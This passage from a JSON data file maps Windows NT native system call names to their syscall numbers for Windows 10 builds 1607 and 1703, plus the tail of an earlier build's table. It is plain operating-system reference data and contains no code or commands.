\"NtWaitForAlertByThreadId\": 438, \"NtWaitForDebugEvent\": 439, \"NtWaitForKeyedEvent\": 440, \"NtWaitForWorkViaWorkerFactory\": 441, \"NtWaitHighEventPair\": 442, \"NtWaitLowEventPair\": 443}, \"1607\": {\"NtAccessCheck\": 0, \"NtWorkerFactoryWorkerReady\": 1, \"NtAcceptConnectPort\": 2, \"NtMapUserPhysicalPagesScatter\": 3, \"NtWaitForSingleObject\": 4, \"NtCallbackReturn\": 5, \"NtReadFile\": 6, \"NtDeviceIoControlFile\": 7, \"NtWriteFile\": 8, \"NtRemoveIoCompletion\": 9, \"NtReleaseSemaphore\": 10, \"NtReplyWaitReceivePort\": 11, \"NtReplyPort\": 12, \"NtSetInformationThread\": 13, \"NtSetEvent\": 14, \"NtClose\": 15, \"NtQueryObject\": 16, \"NtQueryInformationFile\": 17, \"NtOpenKey\": 18, \"NtEnumerateValueKey\": 19, \"NtFindAtom\": 20, \"NtQueryDefaultLocale\": 21, \"NtQueryKey\": 22, \"NtQueryValueKey\": 23, \"NtAllocateVirtualMemory\": 24, \"NtQueryInformationProcess\": 25, \"NtWaitForMultipleObjects32\": 26, \"NtWriteFileGather\": 27, \"NtSetInformationProcess\": 28, \"NtCreateKey\": 29, \"NtFreeVirtualMemory\": 30, \"NtImpersonateClientOfPort\": 31, \"NtReleaseMutant\": 32, \"NtQueryInformationToken\": 33, \"NtRequestWaitReplyPort\": 34, \"NtQueryVirtualMemory\": 35, \"NtOpenThreadToken\": 36, \"NtQueryInformationThread\": 37, \"NtOpenProcess\": 38, \"NtSetInformationFile\": 39, \"NtMapViewOfSection\": 40, \"NtAccessCheckAndAuditAlarm\": 41, \"NtUnmapViewOfSection\": 42, \"NtReplyWaitReceivePortEx\": 43, \"NtTerminateProcess\": 44, \"NtSetEventBoostPriority\": 45, \"NtReadFileScatter\": 46, \"NtOpenThreadTokenEx\": 47, \"NtOpenProcessTokenEx\": 48, \"NtQueryPerformanceCounter\": 49, \"NtEnumerateKey\": 50, \"NtOpenFile\": 51, \"NtDelayExecution\": 52, \"NtQueryDirectoryFile\": 53, \"NtQuerySystemInformation\": 54, \"NtOpenSection\": 55, \"NtQueryTimer\": 56, \"NtFsControlFile\": 57, \"NtWriteVirtualMemory\": 58, \"NtCloseObjectAuditAlarm\": 59, \"NtDuplicateObject\": 60, \"NtQueryAttributesFile\": 61, \"NtClearEvent\": 62, \"NtReadVirtualMemory\": 63, \"NtOpenEvent\": 64, \"NtAdjustPrivilegesToken\": 65, \"NtDuplicateToken\": 66, \"NtContinue\": 67, \"NtQueryDefaultUILanguage\": 68, \"NtQueueApcThread\": 69, \"NtYieldExecution\": 70, \"NtAddAtom\": 71, \"NtCreateEvent\": 72, \"NtQueryVolumeInformationFile\": 73, \"NtCreateSection\": 74, \"NtFlushBuffersFile\": 75, \"NtApphelpCacheControl\": 76, \"NtCreateProcessEx\": 77, \"NtCreateThread\": 78, \"NtIsProcessInJob\": 79, \"NtProtectVirtualMemory\": 80, \"NtQuerySection\": 81, \"NtResumeThread\": 82, \"NtTerminateThread\": 83, \"NtReadRequestData\": 84, \"NtCreateFile\": 85, \"NtQueryEvent\": 86, \"NtWriteRequestData\": 87, \"NtOpenDirectoryObject\": 88, \"NtAccessCheckByTypeAndAuditAlarm\": 89, \"NtQuerySystemTime\": 90, \"NtWaitForMultipleObjects\": 91, \"NtSetInformationObject\": 92, \"NtCancelIoFile\": 93, \"NtTraceEvent\": 94, \"NtPowerInformation\": 95, \"NtSetValueKey\": 96, \"NtCancelTimer\": 97, \"NtSetTimer\": 98, \"NtAccessCheckByType\": 99, \"NtAccessCheckByTypeResultList\": 100, \"NtAccessCheckByTypeResultListAndAuditAlarm\": 101, \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": 102, \"NtAddAtomEx\": 103, \"NtAddBootEntry\": 104, \"NtAddDriverEntry\": 105, \"NtAdjustGroupsToken\": 106, \"NtAdjustTokenClaimsAndDeviceGroups\": 107, \"NtAlertResumeThread\": 108, \"NtAlertThread\": 109, \"NtAlertThreadByThreadId\": 110, \"NtAllocateLocallyUniqueId\": 111, \"NtAllocateReserveObject\": 112, \"NtAllocateUserPhysicalPages\": 113, \"NtAllocateUuids\": 114, \"NtAlpcAcceptConnectPort\": 115, \"NtAlpcCancelMessage\": 116, \"NtAlpcConnectPort\": 117, \"NtAlpcConnectPortEx\": 118, \"NtAlpcCreatePort\": 119, \"NtAlpcCreatePortSection\": 120, \"NtAlpcCreateResourceReserve\": 121, \"NtAlpcCreateSectionView\": 122, \"NtAlpcCreateSecurityContext\": 123, \"NtAlpcDeletePortSection\": 124, \"NtAlpcDeleteResourceReserve\": 125, \"NtAlpcDeleteSectionView\": 126, \"NtAlpcDeleteSecurityContext\": 127, \"NtAlpcDisconnectPort\": 128, \"NtAlpcImpersonateClientContainerOfPort\": 129, \"NtAlpcImpersonateClientOfPort\": 130, \"NtAlpcOpenSenderProcess\": 131, \"NtAlpcOpenSenderThread\": 132, \"NtAlpcQueryInformation\": 133, \"NtAlpcQueryInformationMessage\": 134, \"NtAlpcRevokeSecurityContext\": 135, \"NtAlpcSendWaitReceivePort\": 136, \"NtAlpcSetInformation\": 137, \"NtAreMappedFilesTheSame\": 138, \"NtAssignProcessToJobObject\": 139, \"NtAssociateWaitCompletionPacket\": 140, \"NtCancelIoFileEx\": 141, \"NtCancelSynchronousIoFile\": 142, \"NtCancelTimer2\": 143, \"NtCancelWaitCompletionPacket\": 144, \"NtCommitComplete\": 145, \"NtCommitEnlistment\": 146, \"NtCommitRegistryTransaction\": 147, \"NtCommitTransaction\": 148, \"NtCompactKeys\": 149, \"NtCompareObjects\": 150, \"NtCompareTokens\": 151, \"NtCompleteConnectPort\": 152, \"NtCompressKey\": 153, \"NtConnectPort\": 154, \"NtCreateDebugObject\": 155, \"NtCreateDirectoryObject\": 156, \"NtCreateDirectoryObjectEx\": 157, \"NtCreateEnclave\": 158, \"NtCreateEnlistment\": 159, \"NtCreateEventPair\": 160, \"NtCreateIRTimer\": 161, \"NtCreateIoCompletion\": 162, \"NtCreateJobObject\": 163, \"NtCreateJobSet\": 164, \"NtCreateKeyTransacted\": 165, \"NtCreateKeyedEvent\": 166, \"NtCreateLowBoxToken\": 167, \"NtCreateMailslotFile\": 168, \"NtCreateMutant\": 169, \"NtCreateNamedPipeFile\": 170, \"NtCreatePagingFile\": 171, \"NtCreatePartition\": 172, \"NtCreatePort\": 173, \"NtCreatePrivateNamespace\": 174, \"NtCreateProcess\": 175, \"NtCreateProfile\": 176, \"NtCreateProfileEx\": 177, \"NtCreateRegistryTransaction\": 178, \"NtCreateResourceManager\": 179, \"NtCreateSemaphore\": 180, \"NtCreateSymbolicLinkObject\": 181, \"NtCreateThreadEx\": 182, \"NtCreateTimer\": 183, \"NtCreateTimer2\": 184, \"NtCreateToken\": 185, \"NtCreateTokenEx\": 186, \"NtCreateTransaction\": 187, \"NtCreateTransactionManager\": 188, \"NtCreateUserProcess\": 189, \"NtCreateWaitCompletionPacket\": 190, \"NtCreateWaitablePort\": 191, \"NtCreateWnfStateName\": 192, \"NtCreateWorkerFactory\": 193, \"NtDebugActiveProcess\": 194, \"NtDebugContinue\": 195, \"NtDeleteAtom\": 196, \"NtDeleteBootEntry\": 197, \"NtDeleteDriverEntry\": 198, \"NtDeleteFile\": 199, \"NtDeleteKey\": 200, \"NtDeleteObjectAuditAlarm\": 201, \"NtDeletePrivateNamespace\": 202, \"NtDeleteValueKey\": 203, \"NtDeleteWnfStateData\": 204, \"NtDeleteWnfStateName\": 205, \"NtDisableLastKnownGood\": 206, \"NtDisplayString\": 207, \"NtDrawText\": 208, \"NtEnableLastKnownGood\": 209, \"NtEnumerateBootEntries\": 210, \"NtEnumerateDriverEntries\": 211, \"NtEnumerateSystemEnvironmentValuesEx\": 212, \"NtEnumerateTransactionObject\": 213, \"NtExtendSection\": 214, \"NtFilterBootOption\": 215, \"NtFilterToken\": 216, \"NtFilterTokenEx\": 217, \"NtFlushBuffersFileEx\": 218, \"NtFlushInstallUILanguage\": 219, \"NtFlushInstructionCache\": 220, \"NtFlushKey\": 221, \"NtFlushProcessWriteBuffers\": 222, \"NtFlushVirtualMemory\": 223, \"NtFlushWriteBuffer\": 224, \"NtFreeUserPhysicalPages\": 225, \"NtFreezeRegistry\": 226, \"NtFreezeTransactions\": 227, \"NtGetCachedSigningLevel\": 228, \"NtGetCompleteWnfStateSubscription\": 229, \"NtGetContextThread\": 230, \"NtGetCurrentProcessorNumber\": 231, \"NtGetCurrentProcessorNumberEx\": 232, \"NtGetDevicePowerState\": 233, \"NtGetMUIRegistryInfo\": 234, \"NtGetNextProcess\": 235, \"NtGetNextThread\": 236, \"NtGetNlsSectionPtr\": 237, \"NtGetNotificationResourceManager\": 238, \"NtGetWriteWatch\": 239, \"NtImpersonateAnonymousToken\": 240, \"NtImpersonateThread\": 241, \"NtInitializeEnclave\": 242, \"NtInitializeNlsFiles\": 243, \"NtInitializeRegistry\": 244, \"NtInitiatePowerAction\": 245, \"NtIsSystemResumeAutomatic\": 246, \"NtIsUILanguageComitted\": 247, \"NtListenPort\": 248, \"NtLoadDriver\": 249, \"NtLoadEnclaveData\": 250, \"NtLoadKey\": 251, \"NtLoadKey2\": 252, \"NtLoadKeyEx\": 253, \"NtLockFile\": 254, \"NtLockProductActivationKeys\": 255, \"NtLockRegistryKey\": 256, \"NtLockVirtualMemory\": 257, \"NtMakePermanentObject\": 258, \"NtMakeTemporaryObject\": 259, \"NtManagePartition\": 260, \"NtMapCMFModule\": 261, \"NtMapUserPhysicalPages\": 262, \"NtModifyBootEntry\": 263, \"NtModifyDriverEntry\": 264, \"NtNotifyChangeDirectoryFile\": 265, \"NtNotifyChangeKey\": 266, \"NtNotifyChangeMultipleKeys\": 267, \"NtNotifyChangeSession\": 268, \"NtOpenEnlistment\": 269, \"NtOpenEventPair\": 270, \"NtOpenIoCompletion\": 271, \"NtOpenJobObject\": 272, \"NtOpenKeyEx\": 273, \"NtOpenKeyTransacted\": 274, \"NtOpenKeyTransactedEx\": 275, \"NtOpenKeyedEvent\": 276, \"NtOpenMutant\": 277, \"NtOpenObjectAuditAlarm\": 278, \"NtOpenPartition\": 279, \"NtOpenPrivateNamespace\": 280, \"NtOpenProcessToken\": 281, \"NtOpenRegistryTransaction\": 282, \"NtOpenResourceManager\": 283, \"NtOpenSemaphore\": 284, \"NtOpenSession\": 285, \"NtOpenSymbolicLinkObject\": 286, \"NtOpenThread\": 287, \"NtOpenTimer\": 288, \"NtOpenTransaction\": 289, \"NtOpenTransactionManager\": 290, \"NtPlugPlayControl\": 291, \"NtPrePrepareComplete\": 292, \"NtPrePrepareEnlistment\": 293, \"NtPrepareComplete\": 294, \"NtPrepareEnlistment\": 295, \"NtPrivilegeCheck\": 296, \"NtPrivilegeObjectAuditAlarm\": 297, \"NtPrivilegedServiceAuditAlarm\": 298, \"NtPropagationComplete\": 299, \"NtPropagationFailed\": 300, \"NtPulseEvent\": 301, \"NtQueryBootEntryOrder\": 302, \"NtQueryBootOptions\": 303, \"NtQueryDebugFilterState\": 304, \"NtQueryDirectoryObject\": 305, \"NtQueryDriverEntryOrder\": 306, \"NtQueryEaFile\": 307, \"NtQueryFullAttributesFile\": 308, \"NtQueryInformationAtom\": 309, \"NtQueryInformationEnlistment\": 310, \"NtQueryInformationJobObject\": 311, \"NtQueryInformationPort\": 312, \"NtQueryInformationResourceManager\": 313, \"NtQueryInformationTransaction\": 314, \"NtQueryInformationTransactionManager\": 315, \"NtQueryInformationWorkerFactory\": 316, \"NtQueryInstallUILanguage\": 317, \"NtQueryIntervalProfile\": 318, \"NtQueryIoCompletion\": 319, \"NtQueryLicenseValue\": 320, \"NtQueryMultipleValueKey\": 321, \"NtQueryMutant\": 322, \"NtQueryOpenSubKeys\": 323, \"NtQueryOpenSubKeysEx\": 324, \"NtQueryPortInformationProcess\": 325, \"NtQueryQuotaInformationFile\": 326, \"NtQuerySecurityAttributesToken\": 327, \"NtQuerySecurityObject\": 328, \"NtQuerySecurityPolicy\": 329, \"NtQuerySemaphore\": 330, \"NtQuerySymbolicLinkObject\": 331, \"NtQuerySystemEnvironmentValue\": 332, \"NtQuerySystemEnvironmentValueEx\": 333, \"NtQuerySystemInformationEx\": 334, \"NtQueryTimerResolution\": 335, \"NtQueryWnfStateData\": 336, \"NtQueryWnfStateNameInformation\": 337, \"NtQueueApcThreadEx\": 338, \"NtRaiseException\": 339, \"NtRaiseHardError\": 340, \"NtReadOnlyEnlistment\": 341, \"NtRecoverEnlistment\": 342, \"NtRecoverResourceManager\": 343, \"NtRecoverTransactionManager\": 344, \"NtRegisterProtocolAddressInformation\": 345, \"NtRegisterThreadTerminatePort\": 346, \"NtReleaseKeyedEvent\": 347, \"NtReleaseWorkerFactoryWorker\": 348, \"NtRemoveIoCompletionEx\": 349, \"NtRemoveProcessDebug\": 350, \"NtRenameKey\": 351, \"NtRenameTransactionManager\": 352, \"NtReplaceKey\": 353, \"NtReplacePartitionUnit\": 354, \"NtReplyWaitReplyPort\": 355, \"NtRequestPort\": 356, \"NtResetEvent\": 357, \"NtResetWriteWatch\": 358, \"NtRestoreKey\": 359, \"NtResumeProcess\": 360, \"NtRevertContainerImpersonation\": 361, \"NtRollbackComplete\": 362, \"NtRollbackEnlistment\": 363, \"NtRollbackRegistryTransaction\": 364, \"NtRollbackTransaction\": 365, \"NtRollforwardTransactionManager\": 366, \"NtSaveKey\": 367, \"NtSaveKeyEx\": 368, \"NtSaveMergedKeys\": 369, \"NtSecureConnectPort\": 370, \"NtSerializeBoot\": 371, \"NtSetBootEntryOrder\": 372, \"NtSetBootOptions\": 373, \"NtSetCachedSigningLevel\": 374, \"NtSetCachedSigningLevel2\": 375, \"NtSetContextThread\": 376, \"NtSetDebugFilterState\": 377, \"NtSetDefaultHardErrorPort\": 378, \"NtSetDefaultLocale\": 379, \"NtSetDefaultUILanguage\": 380, \"NtSetDriverEntryOrder\": 381, \"NtSetEaFile\": 382, \"NtSetHighEventPair\": 383, \"NtSetHighWaitLowEventPair\": 384, \"NtSetIRTimer\": 385, \"NtSetInformationDebugObject\": 386, \"NtSetInformationEnlistment\": 387, \"NtSetInformationJobObject\": 388, \"NtSetInformationKey\": 389, \"NtSetInformationResourceManager\": 390, \"NtSetInformationSymbolicLink\": 391, \"NtSetInformationToken\": 392, \"NtSetInformationTransaction\": 393, \"NtSetInformationTransactionManager\": 394, \"NtSetInformationVirtualMemory\": 395, \"NtSetInformationWorkerFactory\": 396, \"NtSetIntervalProfile\": 397, \"NtSetIoCompletion\": 398, \"NtSetIoCompletionEx\": 399, \"NtSetLdtEntries\": 400, \"NtSetLowEventPair\": 401, \"NtSetLowWaitHighEventPair\": 402, \"NtSetQuotaInformationFile\": 403, \"NtSetSecurityObject\": 404, \"NtSetSystemEnvironmentValue\": 405, \"NtSetSystemEnvironmentValueEx\": 406, \"NtSetSystemInformation\": 407, \"NtSetSystemPowerState\": 408, \"NtSetSystemTime\": 409, \"NtSetThreadExecutionState\": 410, \"NtSetTimer2\": 411, \"NtSetTimerEx\": 412, \"NtSetTimerResolution\": 413, \"NtSetUuidSeed\": 414, \"NtSetVolumeInformationFile\": 415, \"NtSetWnfProcessNotificationEvent\": 416, \"NtShutdownSystem\": 417, \"NtShutdownWorkerFactory\": 418, \"NtSignalAndWaitForSingleObject\": 419, \"NtSinglePhaseReject\": 420, \"NtStartProfile\": 421, \"NtStopProfile\": 422, \"NtSubscribeWnfStateChange\": 423, \"NtSuspendProcess\": 424, \"NtSuspendThread\": 425, \"NtSystemDebugControl\": 426, \"NtTerminateJobObject\": 427, \"NtTestAlert\": 428, \"NtThawRegistry\": 429, \"NtThawTransactions\": 430, \"NtTraceControl\": 431, \"NtTranslateFilePath\": 432, \"NtUmsThreadYield\": 433, \"NtUnloadDriver\": 434, \"NtUnloadKey\": 435, \"NtUnloadKey2\": 436, \"NtUnloadKeyEx\": 437, \"NtUnlockFile\": 438, \"NtUnlockVirtualMemory\": 439, \"NtUnmapViewOfSectionEx\": 440, \"NtUnsubscribeWnfStateChange\": 441, \"NtUpdateWnfStateData\": 442, \"NtVdmControl\": 443, \"NtWaitForAlertByThreadId\": 444, \"NtWaitForDebugEvent\": 445, \"NtWaitForKeyedEvent\": 446, \"NtWaitForWorkViaWorkerFactory\": 447, \"NtWaitHighEventPair\": 448, \"NtWaitLowEventPair\": 449}, \"1703\": {\"NtAccessCheck\": 0, \"NtWorkerFactoryWorkerReady\": 1, \"NtAcceptConnectPort\": 2, \"NtMapUserPhysicalPagesScatter\": 3, \"NtWaitForSingleObject\": 4, \"NtCallbackReturn\": 5, \"NtReadFile\": 6, \"NtDeviceIoControlFile\": 7, \"NtWriteFile\": 8, \"NtRemoveIoCompletion\": 9, \"NtReleaseSemaphore\": 10, \"NtReplyWaitReceivePort\": 11, \"NtReplyPort\": 12, \"NtSetInformationThread\": 13, \"NtSetEvent\": 14, \"NtClose\": 15, \"NtQueryObject\": 16, \"NtQueryInformationFile\": 17, \"NtOpenKey\": 18, \"NtEnumerateValueKey\": 19, \"NtFindAtom\": 20, \"NtQueryDefaultLocale\": 21, \"NtQueryKey\": 22, \"NtQueryValueKey\": 23, \"NtAllocateVirtualMemory\": 24, \"NtQueryInformationProcess\": 25, \"NtWaitForMultipleObjects32\": 26, \"NtWriteFileGather\": 27, \"NtSetInformationProcess\": 28, \"NtCreateKey\": 29, \"NtFreeVirtualMemory\": 30, \"NtImpersonateClientOfPort\": 31, \"NtReleaseMutant\": 32, \"NtQueryInformationToken\": 33, \"NtRequestWaitReplyPort\": 34, \"NtQueryVirtualMemory\": 35, \"NtOpenThreadToken\": 36, \"NtQueryInformationThread\": 37, \"NtOpenProcess\": 38, \"NtSetInformationFile\": 39, \"NtMapViewOfSection\": 40, \"NtAccessCheckAndAuditAlarm\": 41, \"NtUnmapViewOfSection\": 42, \"NtReplyWaitReceivePortEx\": 43, \"NtTerminateProcess\": 44, \"NtSetEventBoostPriority\": 45, \"NtReadFileScatter\": 46, \"NtOpenThreadTokenEx\": 47, \"NtOpenProcessTokenEx\": 48, \"NtQueryPerformanceCounter\": 49, \"NtEnumerateKey\": 50, \"NtOpenFile\": 51, \"NtDelayExecution\": 52, \"NtQueryDirectoryFile\": 53, \"NtQuerySystemInformation\": 54, \"NtOpenSection\": 55, \"NtQueryTimer\": 56, \"NtFsControlFile\": 57, \"NtWriteVirtualMemory\": 58, \"NtCloseObjectAuditAlarm\": 59, \"NtDuplicateObject\": 60, \"NtQueryAttributesFile\": 61, \"NtClearEvent\": 62, \"NtReadVirtualMemory\": 63, \"NtOpenEvent\": 64, \"NtAdjustPrivilegesToken\": 65, \"NtDuplicateToken\": 66, \"NtContinue\": 67, \"NtQueryDefaultUILanguage\": 68, \"NtQueueApcThread\": 69, \"NtYieldExecution\": 70, \"NtAddAtom\": 71, \"NtCreateEvent\": 72, \"NtQueryVolumeInformationFile\": 73, \"NtCreateSection\": 74, \"NtFlushBuffersFile\": 75, \"NtApphelpCacheControl\": 76, \"NtCreateProcessEx\": 77, \"NtCreateThread\": 78, \"NtIsProcessInJob\": 79, \"NtProtectVirtualMemory\": 80, \"NtQuerySection\": 81, \"NtResumeThread\": 82, \"NtTerminateThread\": 83, \"NtReadRequestData\": 84, \"NtCreateFile\": 85, \"NtQueryEvent\": 86, \"NtWriteRequestData\": 87, \"NtOpenDirectoryObject\": 88, \"NtAccessCheckByTypeAndAuditAlarm\": 89, \"NtQuerySystemTime\": 90, \"NtWaitForMultipleObjects\": 91, \"NtSetInformationObject\": 92, \"NtCancelIoFile\": 93, \"NtTraceEvent\": 94, \"NtPowerInformation\": 95, \"NtSetValueKey\": 96, \"NtCancelTimer\": 97, \"NtSetTimer\": 98, \"NtAccessCheckByType\": 99, \"NtAccessCheckByTypeResultList\": 100, \"NtAccessCheckByTypeResultListAndAuditAlarm\": 101, \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": 102, \"NtAcquireProcessActivityReference\": 103, \"NtAddAtomEx\": 104, \"NtAddBootEntry\": 105, \"NtAddDriverEntry\": 106, \"NtAdjustGroupsToken\": 107, \"NtAdjustTokenClaimsAndDeviceGroups\": 108, \"NtAlertResumeThread\": 109, \"NtAlertThread\": 110, \"NtAlertThreadByThreadId\": 111, \"NtAllocateLocallyUniqueId\": 112, \"NtAllocateReserveObject\": 113, \"NtAllocateUserPhysicalPages\": 114, \"NtAllocateUuids\": 115, \"NtAlpcAcceptConnectPort\": 116, \"NtAlpcCancelMessage\": 117, \"NtAlpcConnectPort\": 118, \"NtAlpcConnectPortEx\": 119, \"NtAlpcCreatePort\": 120, \"NtAlpcCreatePortSection\": 121, \"NtAlpcCreateResourceReserve\": 122, \"NtAlpcCreateSectionView\": 123, \"NtAlpcCreateSecurityContext\": 124, \"NtAlpcDeletePortSection\": 125, \"NtAlpcDeleteResourceReserve\": 126, \"NtAlpcDeleteSectionView\": 127, \"NtAlpcDeleteSecurityContext\": 128, \"NtAlpcDisconnectPort\": 129, \"NtAlpcImpersonateClientContainerOfPort\": 130, \"NtAlpcImpersonateClientOfPort\": 131, \"NtAlpcOpenSenderProcess\": 132, \"NtAlpcOpenSenderThread\": 133, \"NtAlpcQueryInformation\": 134, \"NtAlpcQueryInformationMessage\": 135, \"NtAlpcRevokeSecurityContext\": 136, \"NtAlpcSendWaitReceivePort\": 137, \"NtAlpcSetInformation\": 138, \"NtAreMappedFilesTheSame\": 139, \"NtAssignProcessToJobObject\": 140, \"NtAssociateWaitCompletionPacket\": 141, \"NtCancelIoFileEx\": 142, \"NtCancelSynchronousIoFile\": 143, \"NtCancelTimer2\": 144, \"NtCancelWaitCompletionPacket\": 145, \"NtCommitComplete\": 146, \"NtCommitEnlistment\": 147, \"NtCommitRegistryTransaction\": 148, \"NtCommitTransaction\": 149, \"NtCompactKeys\": 150, \"NtCompareObjects\": 151, \"NtCompareSigningLevels\": 152, \"NtCompareTokens\": 153, \"NtCompleteConnectPort\": 154, \"NtCompressKey\": 155, \"NtConnectPort\": 156, \"NtConvertBetweenAuxiliaryCounterAndPerformanceCounter\": 157, \"NtCreateDebugObject\": 158, \"NtCreateDirectoryObject\": 159, \"NtCreateDirectoryObjectEx\": 160, \"NtCreateEnclave\": 161, \"NtCreateEnlistment\": 162, \"NtCreateEventPair\": 163, \"NtCreateIRTimer\": 164, \"NtCreateIoCompletion\": 165, \"NtCreateJobObject\": 166, \"NtCreateJobSet\": 167, \"NtCreateKeyTransacted\": 168, \"NtCreateKeyedEvent\": 169, \"NtCreateLowBoxToken\": 170, \"NtCreateMailslotFile\": 171, \"NtCreateMutant\": 172, \"NtCreateNamedPipeFile\": 173, \"NtCreatePagingFile\": 174, \"NtCreatePartition\": 175, \"NtCreatePort\": 176, \"NtCreatePrivateNamespace\": 177, \"NtCreateProcess\": 178, \"NtCreateProfile\": 179, \"NtCreateProfileEx\": 180, \"NtCreateRegistryTransaction\": 181, \"NtCreateResourceManager\": 182, \"NtCreateSemaphore\": 183, \"NtCreateSymbolicLinkObject\": 184, \"NtCreateThreadEx\": 185, \"NtCreateTimer\": 186, \"NtCreateTimer2\": 187, \"NtCreateToken\": 188, \"NtCreateTokenEx\": 189, \"NtCreateTransaction\": 190, \"NtCreateTransactionManager\": 191, \"NtCreateUserProcess\": 192, \"NtCreateWaitCompletionPacket\": 193, \"NtCreateWaitablePort\": 194, \"NtCreateWnfStateName\": 195, \"NtCreateWorkerFactory\": 196, \"NtDebugActiveProcess\": 197, \"NtDebugContinue\": 198, \"NtDeleteAtom\": 199, \"NtDeleteBootEntry\": 200, \"NtDeleteDriverEntry\": 201, \"NtDeleteFile\": 202, \"NtDeleteKey\": 203, \"NtDeleteObjectAuditAlarm\": 204, \"NtDeletePrivateNamespace\": 205, \"NtDeleteValueKey\": 206, \"NtDeleteWnfStateData\": 207, \"NtDeleteWnfStateName\": 208, \"NtDisableLastKnownGood\": 209, \"NtDisplayString\": 210, \"NtDrawText\": 211, \"NtEnableLastKnownGood\": 212, \"NtEnumerateBootEntries\": 213, \"NtEnumerateDriverEntries\": 214, \"NtEnumerateSystemEnvironmentValuesEx\": 215, \"NtEnumerateTransactionObject\": 216, \"NtExtendSection\": 217, \"NtFilterBootOption\": 218, \"NtFilterToken\": 219, \"NtFilterTokenEx\": 220, \"NtFlushBuffersFileEx\": 221, \"NtFlushInstallUILanguage\": 222, \"NtFlushInstructionCache\": 223, \"NtFlushKey\": 224, \"NtFlushProcessWriteBuffers\": 225, \"NtFlushVirtualMemory\": 226, \"NtFlushWriteBuffer\": 227, \"NtFreeUserPhysicalPages\": 228, \"NtFreezeRegistry\": 229, \"NtFreezeTransactions\": 230, \"NtGetCachedSigningLevel\": 231, \"NtGetCompleteWnfStateSubscription\": 232, \"NtGetContextThread\": 233, \"NtGetCurrentProcessorNumber\": 234, \"NtGetCurrentProcessorNumberEx\": 235, \"NtGetDevicePowerState\": 236, \"NtGetMUIRegistryInfo\": 237, \"NtGetNextProcess\": 238, \"NtGetNextThread\": 239, \"NtGetNlsSectionPtr\": 240, \"NtGetNotificationResourceManager\": 241, \"NtGetWriteWatch\": 242, \"NtImpersonateAnonymousToken\": 243, \"NtImpersonateThread\": 244, \"NtInitializeEnclave\": 245, \"NtInitializeNlsFiles\": 246, \"NtInitializeRegistry\": 247, \"NtInitiatePowerAction\": 248, \"NtIsSystemResumeAutomatic\": 249, \"NtIsUILanguageComitted\": 250, \"NtListenPort\": 251, \"NtLoadDriver\": 252, \"NtLoadEnclaveData\": 253, \"NtLoadHotPatch\": 254, \"NtLoadKey\": 255, \"NtLoadKey2\": 256, \"NtLoadKeyEx\": 257, \"NtLockFile\": 258, \"NtLockProductActivationKeys\": 259, \"NtLockRegistryKey\": 260, \"NtLockVirtualMemory\": 261, \"NtMakePermanentObject\": 262, \"NtMakeTemporaryObject\": 263, \"NtManagePartition\": 264, \"NtMapCMFModule\": 265, \"NtMapUserPhysicalPages\": 266, \"NtModifyBootEntry\": 267, \"NtModifyDriverEntry\": 268, \"NtNotifyChangeDirectoryFile\": 269, \"NtNotifyChangeKey\": 270, \"NtNotifyChangeMultipleKeys\": 271, \"NtNotifyChangeSession\": 272, \"NtOpenEnlistment\": 273, \"NtOpenEventPair\": 274, \"NtOpenIoCompletion\": 275, \"NtOpenJobObject\": 276, \"NtOpenKeyEx\": 277, \"NtOpenKeyTransacted\": 278, \"NtOpenKeyTransactedEx\": 279, \"NtOpenKeyedEvent\": 280, \"NtOpenMutant\": 281, \"NtOpenObjectAuditAlarm\": 282, \"NtOpenPartition\": 283, \"NtOpenPrivateNamespace\": 284, \"NtOpenProcessToken\": 285, \"NtOpenRegistryTransaction\": 286, \"NtOpenResourceManager\": 287, \"NtOpenSemaphore\": 288, \"NtOpenSession\": 289, \"NtOpenSymbolicLinkObject\": 290, \"NtOpenThread\": 291, \"NtOpenTimer\": 292, \"NtOpenTransaction\": 293, \"NtOpenTransactionManager\": 294, \"NtPlugPlayControl\": 295, \"NtPrePrepareComplete\": 296, \"NtPrePrepareEnlistment\": 297, \"NtPrepareComplete\": 298, \"NtPrepareEnlistment\": 299, \"NtPrivilegeCheck\": 300, \"NtPrivilegeObjectAuditAlarm\": 301, \"NtPrivilegedServiceAuditAlarm\": 302, \"NtPropagationComplete\": 303, \"NtPropagationFailed\": 304, \"NtPulseEvent\": 305, \"NtQueryAuxiliaryCounterFrequency\": 306, \"NtQueryBootEntryOrder\": 307, \"NtQueryBootOptions\": 308, \"NtQueryDebugFilterState\": 309, \"NtQueryDirectoryObject\": 310, \"NtQueryDriverEntryOrder\": 311, \"NtQueryEaFile\": 312, \"NtQueryFullAttributesFile\": 313, \"NtQueryInformationAtom\": 314, \"NtQueryInformationByName\": 315, \"NtQueryInformationEnlistment\": 316, \"NtQueryInformationJobObject\": 317, \"NtQueryInformationPort\": 318, \"NtQueryInformationResourceManager\": 319, \"NtQueryInformationTransaction\": 320, \"NtQueryInformationTransactionManager\": 321, \"NtQueryInformationWorkerFactory\": 322, \"NtQueryInstallUILanguage\": 323, \"NtQueryIntervalProfile\": 324, \"NtQueryIoCompletion\": 325, \"NtQueryLicenseValue\": 326, \"NtQueryMultipleValueKey\": 327, \"NtQueryMutant\": 328, \"NtQueryOpenSubKeys\": 329, \"NtQueryOpenSubKeysEx\": 330, \"NtQueryPortInformationProcess\": 331, \"NtQueryQuotaInformationFile\": 332, \"NtQuerySecurityAttributesToken\": 333, \"NtQuerySecurityObject\": 334, \"NtQuerySecurityPolicy\": 335, \"NtQuerySemaphore\": 336, \"NtQuerySymbolicLinkObject\": 337, \"NtQuerySystemEnvironmentValue\": 338, \"NtQuerySystemEnvironmentValueEx\": 339, \"NtQuerySystemInformationEx\": 340, \"NtQueryTimerResolution\": 341, \"NtQueryWnfStateData\": 342, \"NtQueryWnfStateNameInformation\": 343, \"NtQueueApcThreadEx\": 344, \"NtRaiseException\": 345, \"NtRaiseHardError\": 346, \"NtReadOnlyEnlistment\": 347, \"NtRecoverEnlistment\": 348, \"NtRecoverResourceManager\": 349, \"NtRecoverTransactionManager\": 350, \"NtRegisterProtocolAddressInformation\": 351, \"NtRegisterThreadTerminatePort\": 352, \"NtReleaseKeyedEvent\": 353, \"NtReleaseWorkerFactoryWorker\": 354, \"NtRemoveIoCompletionEx\": 355, \"NtRemoveProcessDebug\": 356, \"NtRenameKey\": 357, \"NtRenameTransactionManager\": 358, \"NtReplaceKey\": 359, \"NtReplacePartitionUnit\": 360, \"NtReplyWaitReplyPort\": 361, \"NtRequestPort\": 362, \"NtResetEvent\": 363, \"NtResetWriteWatch\": 364, \"NtRestoreKey\": 365, \"NtResumeProcess\": 366, \"NtRevertContainerImpersonation\": 367, 